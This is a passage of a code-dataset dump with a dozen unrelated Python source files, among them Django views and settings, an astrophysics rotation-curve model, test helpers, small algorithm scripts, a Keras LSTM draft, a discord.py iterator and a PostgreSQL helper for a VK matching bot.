to_friend=friend)\n friendship.save()\n return HttpResponseRedirect(reverse(\n 'profiles:user', kwargs={'username': request.user.username}\n ))\n else:\n return Http404\n\n\n@login_required\ndef friend_invite(request):\n if request.method == 'POST':\n form = FriendInvitationForm(request.POST)\n if form.is_valid():\n # Whether user already registered or not\n name = form.cleaned_data['name'],\n email = form.cleaned_data['email']\n if User.objects.filter(email=email).exists():\n # TODO: fix invitation button using css!!\n messages.info(request, f'{name[0]} already registered')\n return render(request, 'profiles/friend_invite.html')\n\n invitation = Invitation(\n name=form.cleaned_data['name'],\n email=form.cleaned_data['email'],\n code=User.objects.make_random_password(20),\n sender=request.user\n )\n invitation.save()\n # Send invitation email\n invitation.send()\n # TODO: disable invitation form after send out messages\n messages.success(request, 'Invitation send out successfully')\n return HttpResponseRedirect(reverse('profiles:friend_invite'))\n else:\n form = FriendInvitationForm()\n\n context = {'form': form}\n return render(request, 'profiles/friend_invite.html', context)\n\n\ndef friend_accept(request, code):\n invitation = get_object_or_404(Invitation, code__exact=code)\n request.session['invitation'] = invitation.id\n return HttpResponseRedirect(reverse('accounts:signup'))\n\n\n@login_required\ndef profile_edit(request, username):\n user = get_object_or_404(User, username=username)\n # Prevent edit other user's page\n if user != request.user:\n raise Http404\n\n profile = Profile.objects.get(user=user)\n\n form = ProfileForm(request.POST or None, instance=profile)\n if form.is_valid():\n # Save changes\n form.save()\n # obj = form.save(commit=False)\n # obj.save()\n # Redirect to get_absolute_url specified within Profile model\n # return redirect(obj)\n return HttpResponseRedirect(reverse('profiles:user', args=(user.username,)))\n\n context = {'form': form}\n return render(request, 'profiles/profile_form.html', context)\n","sub_path":"src/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561152066","text":"# This is an attempt at a more numerically stable, cleaned-up\n# version of the Neros calculations. \n# The big changes are that it uses the calculations in NumericalStability.ipynb\n# and uses and interpolated MW phi to avoid data issues\n# I'm going to implement it as a class, instead\n# of a namespace of functions, which should make using it easier\n# Particularly, since we'll be using the same Milky Way data\n# to do a family of fits, that will be a class member\n# Usage will be documented in the class\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\nimport scipy.integrate\n\n\nc = 3 * (10**5) # km/s\n\nclass Neros:\n \"\"\"The Neros Model\n \n This class implements the actual computations of\n the Neros model. Since the model depends on the Milky Way\n mass curve, each instance of this class will need to be \n supplied with one. Meaning that if you want to do multiple\n Milky Way models, each will need its own instance.\n \n Create an instance by calling\n Neros(milky_way_data)\n \n The data can be in the form of a NumPy array (of shape N x 2),\n a Pandas DataFrame with two columns, or a list of tuples.\n Look at the DataImporter.py file for help reading from files \n if needed. The data must come in the order\n radius, vLum (it ignores Pandas column names).\n \n The Milky Way data can be changed later by calling setMilkyWay\n \"\"\"\n \n def __init__(self, milky_way_data):\n #This will check if the Milky Way data\n #is properly formatted, and raise an exception\n #if it isn't\n self.setMilkyWay(milky_way_data)\n \n def setMilkyWay(self, milky_way_data):\n \"\"\"Changes the internal Milky Way\n \n Data must be two columns in the order radius, vLum, \n either as a NumPy array, a Pandas DataFrame, or a\n list of tuples\n \n This automatically sets up the appropriate interpolators\"\"\"\n \n data = np.array(milky_way_data)\n \n if len(data.shape) != 2 or data.shape[0] < 2 or data.shape[1] != 2:\n raise ValueError(\"Milky Way data was not in the form of two columns\")\n \n #Retain the data, just in case, but we'll mostly be doing interpolation\n self.milky_way_data = data\n self.mw_vLum_interp = interp1d(data[:,0], data[:,1], kind='cubic')\n mw_phi = self.phi(data[:,0], data[:,1])\n self.mw_phi_interp = interp1d(data[:,0], mw_phi)\n \n def phi(self, radius, vlum):\n \"\"\"Computes potential. phi = integrate vlum^2/r/c^2\"\"\"\n \n x = radius\n y = np.square(vlum) / (x*c*c)\n x = np.concatenate([np.array([0]), x])\n y = np.concatenate([np.array([0]), y])\n #May want to switch to Simpson's rule: scipy.integrate.simps\n return scipy.integrate.cumtrapz(y,x)\n \n def vNeros(self, galaxy_rad, galaxy_vLum, alpha, phi_zero=3e-11):\n \"\"\"This computes the predicted vObs\n \n The parameters are\n :galaxy_rad: A 1-D NumPy array or Pandas DataSeries of radii\n :galaxy_vLum: A 1-D NumPy array or Pandas DataSeries of vLums\n :alpha: From the equation vObs^2 = vLum^2 + alpha*vLCM^2\n :phi_zero: The zero point for the phi integration, used in kappa calculation\n \n This calls sqrt internally, so it can fail for some values of alpha.\"\"\"\n \n return np.sqrt(self.vNerosSquared(galaxy_rad, galaxy_vLum, alpha, phi_zero=3e-11))\n \n def vNerosSquared(self, galaxy_rad, galaxy_vLum, alpha, phi_zero=3e-11):\n \"\"\"This computes the predicted vObs^2, basically by calling vLCM and applying alpha\n \n The parameters are\n :galaxy_rad: A 1-D NumPy array or Pandas DataSeries of radii\n :galaxy_vLum: A 1-D NumPy array or Pandas DataSeries of vLums\n :alpha: From the equation vObs^2 = vLum^2 + alpha*vLCM^2\n :phi_zero: The zero point for the phi integration, used in kappa calculation\n \n This avoids the issues inherent in calling sqrt, but can produce non-physical vObs^2\"\"\"\n \n vLCM = self.vLCM(galaxy_rad, galaxy_vLum, phi_zero)\n \n return np.square(galaxy_vLum) + alpha*vLCM\n \n def vLCM(self, galaxy_rad, galaxy_vLum, phi_zero=3e-11):\n \"\"\"This computes the vLCM - the actual model\n \n The parameters are\n :galaxy_rad: A 1-D NumPy array or Pandas DataSeries of radii\n :galaxy_vLum: A 1-D NumPy array or Pandas DataSeries of vLums\n :alpha: From the equation vObs^2 = vLum^2 + alpha*vLCM^2\n :phi_zero: The zero point for the phi integration, used in kappa calculation\"\"\"\n \n MW_phi = self.mw_phi_interp(galaxy_rad)\n galaxy_phi = self.phi(galaxy_rad, galaxy_vLum)\n k = self.kappa(MW_phi, galaxy_phi, phi_zero)\n v1 = self.v1(MW_phi, galaxy_phi)\n v2 = self.v2(MW_phi, galaxy_phi, galaxy_vLum)\n vLCM = c * c * k * k * v1 * v2\n \n return vLCM\n \n def kappa(self, MW_phi, other_phi, phi_zero=3e-11):\n \"\"\"kappa(r) in the paper, just phi_gal(r)/phi_mw(r)\"\"\"\n \n return (other_phi - phi_zero) / (MW_phi - phi_zero)\n \n def v1(self, MW_phi, other_phi):\n etc = self._eTsiCurveMinusOne(MW_phi, other_phi)\n num = etc**2\n den = (1 + etc)**2 + 1\n return num/den\n \n def v2(self, MW_phi, other_phi, other_vlum):\n etFlat = self._eTsiFlatMinusOne(other_vlum)\n etCurve = self._eTsiCurveMinusOne(MW_phi, other_phi)\n num = 2 + etFlat + etCurve\n den = etFlat - etCurve\n return num/den\n \n def _eTsiFlatMinusOne(self, other_vlum):\n \"\"\"This computes eTsiFlat - 1, compared to the old code, for numerical stability\"\"\"\n \n beta = other_vlum / c\n numerator = 2*beta / (1 - beta)\n denominator = np.sqrt((1+beta) / (1-beta)) + 1\n return numerator / denominator\n \n def _eTsiCurveMinusOne(self, MW_phi, other_phi):\n \"\"\"This computes eTsiFlat - 1, compared to the old code, for numerical stability\"\"\"\n\n numerator = (2*other_phi - 2*MW_phi) / (1 - 2*other_phi)\n denominator = np.sqrt((1 - 2*MW_phi) / (1 - 2*other_phi)) + 1\n return numerator / denominator\n","sub_path":"Neros_v2.py","file_name":"Neros_v2.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"580526536","text":"from site_settings import path\nfrom site_settings import *\n\nDATABASE_ENGINE = 'sqlite3'\nDATABASE_NAME = path('db.sqlite3')\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/admin-media/'\n","sub_path":"skel/settings/dev_settings.py","file_name":"dev_settings.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497363375","text":"from plenum.test.sdk.conftest import sdk_send_signed_requests, sdk_get_replies, sdk_send_random_requests\nfrom plenum.test.batching_3pc.helper import checkNodesHaveSameRoots\nfrom plenum.test import waits\n\n\ndef send_and_check(signed_reqs, looper, txnPoolNodeSet, pool_h, timeout=None):\n if not timeout:\n timeout_per_request = waits.expectedTransactionExecutionTime(len(txnPoolNodeSet))\n # here we try to take into account what timeout for execution\n # N request - total_timeout should be in\n # timeout_per_request < total_timeout < timeout_per_request * N\n # we cannot just take (timeout_per_request * N) because it is so huge.\n # (for timeout_per_request=5 and N=10, total_timeout=50sec)\n # lets start with some simple formula:\n timeout = (1 + len(signed_reqs) / 10) * timeout_per_request\n\n results = sdk_send_signed_requests(pool_h, signed_reqs)\n sdk_get_replies(looper, results, timeout=timeout)\n checkNodesHaveSameRoots(txnPoolNodeSet)\n\n\ndef send_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet, count,\n customTimeoutPerReq: float = None, add_delay_to_timeout: float = 0,\n override_timeout_limit=False, total_timeout=None):\n if not total_timeout:\n node_count = len(txnPoolNodeSet)\n timeout_per_request = customTimeoutPerReq or waits.expectedTransactionExecutionTime(node_count)\n timeout_per_request += add_delay_to_timeout\n # here we try to take into account what timeout for execution\n # N request - total_timeout should be in\n # timeout_per_request < total_timeout < timeout_per_request * N\n # we cannot just take (timeout_per_request * N) because it is so huge.\n # (for timeout_per_request=5 and N=10, total_timeout=50sec)\n # lets start with some simple formula:\n total_timeout = (1 + count / 10) * timeout_per_request\n\n sdk_reqs = sdk_send_random_requests(looper, sdk_pool, sdk_wallet, count)\n sdk_repl = sdk_get_replies(looper, sdk_reqs, timeout=total_timeout)\n return sdk_repl\n\n\ndef send_batches_of_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet, num_reqs, num_batches=1, **kwargs):\n # This method assumes that `num_reqs` <= num_batches*MaxbatchSize\n if num_batches == 1:\n return send_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet, num_reqs, **kwargs)\n\n sdk_resps = []\n for _ in range(num_batches - 1):\n sdk_resps.extend(send_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet,\n num_reqs // num_batches, **kwargs))\n rem = num_reqs % num_batches\n if rem == 0:\n rem = num_reqs // num_batches\n sdk_resps.extend(send_random_and_check(looper, txnPoolNodeSet, sdk_pool, sdk_wallet, rem, **kwargs))\n return sdk_resps\n","sub_path":"plenum/test/sdk/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616665742","text":"import sys\nsys.stdin = open('input/boj_1520_내리막길.txt', 'r')\n# import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10000)\ndy, dx = [-1, 1, 0, 0], [0, 0, -1, 1]\n\ndef dfs(r, c):\n if r == 0 and c == 0:\n return 1\n if memo[r][c] == -1:\n memo[r][c] = 0\n for i in range(4):\n dr, dc = r + dx[i], c + dy[i]\n if 0 <= dr < ROW and 0 <= dc < COL and M[dr][dc] > M[r][c]:\n memo[r][c] += dfs(dr, dc)\n return memo[r][c]\n\n\n\nROW, COL = list(map(int, input().split()))\nM = [list(map(int, input().split())) for i in range(ROW)]\nmemo = [[-1 for _ in range(COL)] for _ in range(ROW)]\n\ndfs(ROW-1, COL-1)\n\nprint(memo[ROW-1][COL-1])","sub_path":"이동규/DP_2/boj_1520_내리막길.py","file_name":"boj_1520_내리막길.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"482701719","text":"import sys\n\ndef collatz(i):\n if i % 2 == 0:\n return i // 2\n else:\n return 3 * i + 1\n\ndef main():\n if sys.argv[1]:\n s = sys.argv[1]\n else:\n s = input('Enter integer: ')\n i = int(s)\n steps = 0\n while i != 1:\n print(i)\n i = collatz(i)\n steps += 1\n print(i)\n print('steps: %s' % (steps, ))\n\nif __name__ == '__main__':\n main()\n","sub_path":"ch03/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287622676","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nimport tensorflow_hub as hub\nfrom tensorflow.keras.layers import Input, LSTM, Dense, Embedding\n\n\nclass LSTMSeqModel(Model):\n def __init__(self):\n pass\n\n def build_model(\n self,\n depth,\n encoder_units,\n vocab_size,\n use_embedding_layer=False,\n embedding_dim=100,\n encoder_input_shape=(300),\n decoder_input_shape=(300),\n batch_size=None,\n ):\n\n # BUILD ENCODER FOR TRAINING\n self.encoder_inputs = Input(shape=encoder_input_shape, batch_size=batch_size, name='encoder_input')\n embedding\n\n encoder_outputs = []\n self.encoder_states = []\n x_encoder = embeded_encoder_inputs\n for layer in range(depth):\n encoder_layer_outputs, state_h, state_c = LSTM(\n encoder_units,\n return_sequences=True,\n return_state=True,\n name=f'encoder_lstm-{layer + 1}',\n )(x_encoder)\n x_encoder = encoder_layer_outputs\n encoder_outputs.append(encoder_layer_outputs)\n # Only care about the states of the encoder\n self.encoder_states.append([state_h, state_c])\n\n # BUILD DECODER FOR TRAINING\n decoder_inputs = Input(shape=decoder_input_shape, batch_size=batch_size, name='decoder_input')\n if use_embedding_layer:\n embedded_decoder_inputs = input_embedding(decoder_inputs)\n else:\n embedded_decoder_inputs = decoder_inputs\n\n decoder_layers = []\n x_decoder = embedded_decoder_inputs\n for layer in range(depth):\n decoder_layer = LSTM(\n encoder_units,\n return_sequences=True,\n return_state=True,\n name=f'decoder_lstm-{layer + 1}',\n )\n decoder_layers.append(decoder_layer)\n x_decoder, _, _ = decoder_layer(x_decoder, initial_state=self.encoder_states[layer])\n decoder_output = x_decoder\n\n decoder_dense = Dense(vocab_size, activation='softmax', name='decoder_ouput')\n decoder_outputs = decoder_dense(x_decoder)\n self.model = Model([self.encoder_inputs, decoder_inputs], decoder_output)\n\n # Inference model --------------------------------------------------------\n\n # self.encoder_model = Model(self.encoder_inputs, self.encoder_states)\n\n # decoder_states_inputs = []\n # decoder_states_outputs = []\n # x_decoder = embedded_decoder_inputs\n # for layer in range(depth):\n # decoder_layer_state_input_h = Input(shape=(encoder_units, ), batch_size=batch_size, name=f'decoder_h_input-{layer+1}')\n # decoder_layer_state_input_c = Input(shape=(encoder_units, ), batch_size=batch_size, name=f'decoder_c_input-{layer+1}')\n # decoder_layer_state_inputs = [decoder_layer_state_input_h, decoder_layer_state_input_c]\n # decoder_states_inputs.append(decoder_layer_state_inputs)\n\n # decoder_outputs, state_h, state_c = decoder_layers[layer](\n # x_decoder, initial_state=decoder_layer_state_inputs\n # )\n # x_decoder = decoder_outputs\n # decoder_states_outputs.append([state_h, state_c])\n\n # decoder_outputs = decoder_dense(decoder_outputs)\n # self.decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states_outputs)\n\n # self.inferenece_model = [self.encoder_model, self.decoder_model]\n # , encoder_model, decoder_model\n\n def compile_model(self):\n self.model.compile(optimizer='Adam', loss='sparse_categorical_crossentropy')\n\n\nclass PreTrainedEmbedding(tf.keras.layers.Layer):\n def __init__(self, mask_value='', **kwargs):\n super(PreTrainedEmbedding, self).__init__(**kwargs)\n self.embedding = hub.KerasLayer(\n \"https://tfhub.dev/google/tf2-preview/nnlm-en-dim50-with-normalization/1\", dtype=tf.string,\n input_shape=[[]], output_shape=[50]\n )\n self.mask_value = mask_value\n\n def call(self, inputs):\n x = self.embedding(inputs)\n return x\n\n def compute_mask(self, inputs, mask=None):\n return inputs == self.mask_value\n\n","sub_path":"src/archive/lstm_seq.py","file_name":"lstm_seq.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140400934","text":"from django.urls import reverse_lazy, reverse\nfrom django.views import generic\nfrom django.shortcuts import render\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth import (\n get_user_model, logout as auth_logout,\n)\nfrom rarestudy.models.article import Article\nfrom rarestudy.forms import UserCreateForm, EditUserForm\n\nUser = get_user_model()\n\nclass SignUpView(generic.CreateView):\n form_class = UserCreateForm\n success_url = reverse_lazy('login')\n template_name = 'registration/signup.html'\n\n\nclass ProfileView(LoginRequiredMixin, generic.ListView):\n model = Article\n template_name = 'registration/profile.html'\n context_object_name = 'Articles'\n paginate_by = 10\n\n def get_queryset(self):\n return Article.objects.filter(user=self.request.user).filter(valid=True).order_by('-created_at')\n\nclass DeleteView(LoginRequiredMixin, generic.View):\n\n def get(self, *args, **kwargs):\n user = User.objects.get(email=self.request.user.email)\n user.is_active = False\n user.save()\n auth_logout(self.request)\n return render(self.request,'registration/delete_complete.html')\n\nclass EditView(LoginRequiredMixin, generic.UpdateView):\n template_name = 'registration/edit.html'\n model = User\n success_url = reverse_lazy('rarestudy:profile')\n form_class = EditUserForm","sub_path":"rarestudy/views/accountView.py","file_name":"accountView.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223170102","text":"import sqlite3\n\nconnection = sqlite3.connect(\"test.db\")\n\nc = connection.cursor()\n\nc.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS tests (\n id integer PRIMARY KEY,\n test_int integer,\n test_text text\n)\n\"\"\")\n\nc.execute(\"\"\"\nINSERT INTO tests VALUES (1, 2, \"test1\")\n\"\"\")\n\nc.execute(\"\"\"\nINSERT INTO tests VALUES (2, 150, \"test2\")\n\"\"\")\n\nc.connection.commit()\n\nfor item in c.execute(\"SELECT * FROM tests\"):\n print(item)","sub_path":"sql-test.py","file_name":"sql-test.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474030446","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2015-2016 Rapptz\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\nDEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport sys\nimport asyncio\nimport aiohttp\nfrom .message import Message\nfrom .object import Object\n\nPY35 = sys.version_info >= (3, 5)\n\nclass LogsFromIterator:\n def __init__(self, client, channel, limit, before, after):\n self.client = client\n self.channel = channel\n self.limit = limit\n self.before = before\n self.after = after\n self.messages = asyncio.Queue()\n\n @asyncio.coroutine\n def fill_messages(self):\n if self.limit > 0:\n retrieve = self.limit if self.limit <= 100 else 100\n data = yield from self.client._logs_from(self.channel, retrieve, self.before, self.after)\n if len(data):\n self.limit -= retrieve\n self.before = Object(id=data[-1]['id'])\n for element in data:\n yield from self.messages.put(Message(channel=self.channel, **element))\n\n if PY35:\n @asyncio.coroutine\n def __aiter__(self):\n return self\n\n @asyncio.coroutine\n def __anext__(self):\n if self.messages.empty():\n yield from self.fill_messages()\n\n try:\n msg = self.messages.get_nowait()\n return msg\n except asyncio.QueueEmpty:\n # if we're still empty at this point...\n # we didn't get any new messages so stop looping\n raise StopAsyncIteration()\n","sub_path":"discord/iterators.py","file_name":"iterators.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"409891210","text":"\"\"\"API Lookups\"\"\"\nimport logging\nimport requests\n\n\nclass APILookup:\n ############################################################\n # constructor\n ############################################################\n def __init__(self, postcode_api_url):\n\n self.postcode_api_url = postcode_api_url\n self.LOGGER = logging.getLogger(__name__)\n\n ############################################################\n # str\n ############################################################\n def __str__(self):\n\n return repr(self.postcode_api_url)\n\n ############################################################\n # Lookup postcode on API to get lat/long\n ############################################################\n\n def do_postcode_lookup(self, post_code):\n \"\"\"Do API postcode lookup\n\n Keyword arguments:\n api_url -- URL for the API call\n post_code -- passed post code to lookup\n \"\"\"\n\n try:\n data = ''\n lkp_url = self.postcode_api_url + str(post_code)\n\n resp = requests.get(url=lkp_url)\n data = resp.json()\n self.LOGGER.debug(data)\n\n except Exception as exrec:\n\n self.LOGGER.error(\"Error in do_postcode_lookup %s\", str(exrec.data), exc_info=True)\n\n finally:\n return data\n","sub_path":"APILookup.py","file_name":"APILookup.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215686767","text":"# coding:utf-8\n\nimport psycopg2\nfrom psycopg2 import sql\n\nimport json\n\nDB_NAME = 'VKinder'\nDB_USER = 'VKinder'\nUSER_PASSWORD = '1234'\nconn = psycopg2.connect(\n dbname=DB_NAME, user=DB_USER, password=USER_PASSWORD,\n host='localhost', port='5432')\n\n\ndef execute_context(query, *args):\n with conn:\n with conn.cursor() as curs:\n curs.execute(query, *args)\n\n\ndef create_user_matches_table():\n query = sql.SQL('CREATE TABLE IF NOT EXISTS user_matches ('\n 'id SERIAL PRIMARY KEY NOT NULL,'\n 'user_vk_id INT NOT NULL,'\n 'match_vk_id INT NOT NULL,'\n 'black_list BOOLEAN DEFAULT FALSE,'\n 'favourite_list BOOLEAN DEFAULT FALSE'\n ')')\n execute_context(query)\n\n\ndef create_photos_table():\n query = sql.SQL('CREATE TABLE IF NOT EXISTS photos ('\n 'photo_id SERIAL PRIMARY KEY NOT NULL,'\n 'match_user_vk_id INT NOT NULL,'\n 'photo_url CHAR(250)'\n ')')\n execute_context(query)\n\n\ndef add_matches(user_vk_id, match_vk_id):\n query = sql.SQL('INSERT INTO user_matches (user_vk_id, match_vk_id) '\n 'SELECT %s, %s '\n 'WHERE NOT EXISTS (SELECT * FROM user_matches '\n 'WHERE user_vk_id= %s AND match_vk_id= %s)')\n execute_context(query, (user_vk_id, match_vk_id, user_vk_id, match_vk_id))\n\n\ndef add_photo(match_user_id, photo_link):\n query = sql.SQL('INSERT INTO photos (match_user_vk_id, photo_url) '\n 'SELECT %s, %s'\n 'WHERE NOT EXISTS (SELECT * FROM photos '\n 'WHERE match_user_vk_id= %s AND photo_url= %s)')\n execute_context(query,\n (match_user_id, photo_link, match_user_id, photo_link))\n\n\ndef get_match_user_id(match_user_vk_id):\n curs = conn.cursor()\n curs.execute('SELECT id FROM user_matches WHERE match_vk_id = (%s)',\n (match_user_vk_id,))\n tmp = curs.fetchall()\n curs.close()\n return tmp[0][0]\n\n\ndef get_10_matches(user_vk_id):\n curs = conn.cursor()\n curs.execute('SELECT match_vk_id FROM user_matches '\n 'WHERE user_vk_id = (%s) '\n 'AND black_list = FALSE LIMIT 10',\n (user_vk_id,))\n tmp = curs.fetchall()\n curs.close()\n matches_list = []\n for m in tmp:\n matches_list.append(m[0])\n return matches_list\n\n\ndef get_photos_by_id(id):\n curs = conn.cursor()\n curs.execute('SELECT photo_url FROM photos WHERE match_user_vk_id = (%s)',\n (id,))\n tmp = curs.fetchall()\n curs.close()\n photo_list = []\n for p in tmp:\n photo_list.append(p[0])\n return photo_list\n\n\ndef add_to_black_list(id):\n query = sql.SQL('UPDATE user_matches SET black_list = true '\n 'WHERE match_vk_id = (%s)')\n execute_context(query, (id,))\n\n\ndef get_users_id_list():\n curs = conn.cursor()\n curs.execute('SELECT user_vk_id FROM user_matches')\n tmp = curs.fetchall()\n curs.close()\n users_list = []\n for u in tmp:\n users_list.append(u[0])\n return users_list\n\n\ndef write_to_json(user_id):\n first_10 = {}\n for u in get_10_matches(user_id):\n first_10[u] = get_photos_by_id(u)\n add_to_black_list(u)\n\n with open(f'files/matches_for_{user_id}.json',\n 'w', encoding='utf-8-sig') as file:\n json.dump(first_10, file, indent=3)","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"68344738","text":"\"\"\"The PiCation module defines the PiCationType and\nPiCationInx for explicit hydrogens.\n\n\"\"\"\n\n\nimport itertools as it\nfrom collections import namedtuple\n\nimport numpy as np\nimport numpy.linalg as la\nfrom scipy.spatial.distance import cdist, euclidean\n\nimport mastic.config.interactions as masticinxconfig\nfrom mastic.interactions.interactions import InteractionType, Interaction, InteractionError\n\nclass PiCationType(InteractionType):\n \"\"\"Defines an InteractionType class for hydrogen bonds between members\n with explicit hydrogens.\n\n \"\"\"\n\n attributes = {}\n interaction_name = \"PiCation\"\n feature_keys = masticinxconfig.PICATION_FEATURE_KEYS\n feature_classifiers = masticinxconfig.PICATION_FEATURES\n degree = masticinxconfig.PICATION_COMMUTATIVITY\n commutative = masticinxconfig.PICATION_COMMUTATIVITY\n interaction_param_keys = masticinxconfig.PICATION_PARAM_KEYS\n\n # parameters set from the config file\n centroid_max_distance = masticinxconfig.PICATION_CENTROID_DIST_MAX\n centroid_offset_max = masticinxconfig.PICATION_OFFSET_MAX\n amine_normal_angle_min = masticinxconfig.PICATION_AMINE_NORMAL_ANGLE_MIN\n tertiary_amine_feature_classifiers = masticinxconfig.PICATION_TERTIARY_AMINE_FEATURE\n heavy_atoms = masticinxconfig.PICATION_HEAVY_ATOMS_ELEMENT_SYMBOLS\n\n def __init__(self, pi_stacking_type_name,\n feature_types=None,\n association_type=None,\n assoc_member_pair_idxs=None,\n **pi_stacking_attrs):\n\n super().__init__(pi_stacking_type_name,\n feature_types=feature_types,\n association_type=association_type,\n assoc_member_pair_idxs=assoc_member_pair_idxs,\n **pi_stacking_attrs)\n\n @staticmethod\n def interaction_constructor(*params, **kwargs):\n return PiCationInx(*params, **kwargs)\n\n @classmethod\n def find_hits(cls, members,\n interaction_classes=None,\n return_feature_keys=False,\n return_failed_hits=False):\n\n # TODO value checks\n\n # scan the pairs for hits and assign interaction classes if given\n return super().find_hits(members,\n interaction_classes=interaction_classes,\n return_feature_keys=return_feature_keys,\n return_failed_hits=return_failed_hits)\n\n @classmethod\n def check(cls, arom, cation):\n\n features = [arom, cation]\n feature_tests = [cls.test_features_centroid_distance,\n cls.test_features_centroid_offset,\n cls.test_features_tertiary_amine]\n\n return super().check(features, feature_tests)\n\n\n\n @classmethod\n def check_centroid_distance(cls, distance):\n \"\"\"For a float distance checks if it is less than the configuration\n file HBOND_DIST_MAX value.\n\n \"\"\"\n if distance <= cls.centroid_max_distance:\n return True\n else:\n return False\n\n @classmethod\n def check_centroid_offset_distance(cls, distance):\n \"\"\"For a float distance checks if it is less than the configuration\n file HBOND_DIST_MAX value.\n\n \"\"\"\n if distance <= cls.centroid_offset_max:\n return True\n else:\n return False\n\n @classmethod\n def test_features_centroid_distance(cls, arom, cation):\n arom_heavy_atom_coords = np.array([atom.coords for atom in arom.atoms if\n atom.atom_type.element in cls.heavy_atoms])\n arom_centroid = calc_centroid(arom_heavy_atom_coords)\n cation_coords = cation.atoms[0].coords\n centroid_distance = euclidean(arom_centroid, cation_coords)\n\n if cls.check_centroid_distance(centroid_distance) is False:\n return False, centroid_distance\n else:\n return True, centroid_distance\n\n @classmethod\n def test_features_centroid_offset(cls, arom, cation):\n arom_heavy_atom_coords = np.array([atom.coords for atom in arom.atoms if\n atom.atom_type.element in cls.heavy_atoms])\n cation_coord = cation.atoms[0].coords\n # calculate the centroid offset\n centroid_offset = calc_centroid_offset(arom_a_heavy_atom_coords,\n cation_coord)\n\n if cls.check_centroid_offset_distance(centroid_offset) is False:\n return False, centroid_offset\n else:\n return True, centroid_offset\n\n @classmethod\n def test_features_tertiary_amine(cls, arom, cation):\n # check for if the cation is a tertiary amine\n if True:\n return True, None\n\n tertiary_amine_angle = calc_tertiary_amine_angle(cation)\n\n if cls.check_tertiary_amine_angle(tertiary_amine_angle):\n return False, tertiary_amine_angle\n else:\n return True, tertiary_amine_angle\n\n @property\n def record(self):\n record_fields = ['interaction_class', 'interaction_type',\n 'association_type', 'assoc_member_pair_idxs',\n 'arom_a_feature_type', 'arom_b_feature_type'] + \\\n list(self.attributes_data.keys())\n PiCationTypeRecord = namedtuple('PiCationTypeRecord', record_fields)\n record_attr = {'interaction_class' : self.name}\n record_attr['interaction_type'] = self.interaction_name\n record_attr['association_type'] = self.association_type.name\n record_attr['assoc_member_pair_idxs'] = self.assoc_member_pair_idxs\n record_attr['arom_a_feature_type'] = self.feature_types[0]\n record_attr['arom_b_feature_type'] = self.feature_types[1]\n\n return PiCationTypeRecord(**record_attr)\n\ndef calc_tertiary_amine_angle(cation):\n angle = None\n return angle\n\ndef calc_centroid_offset(arom_coords, other_centroid):\n arom_centroid = 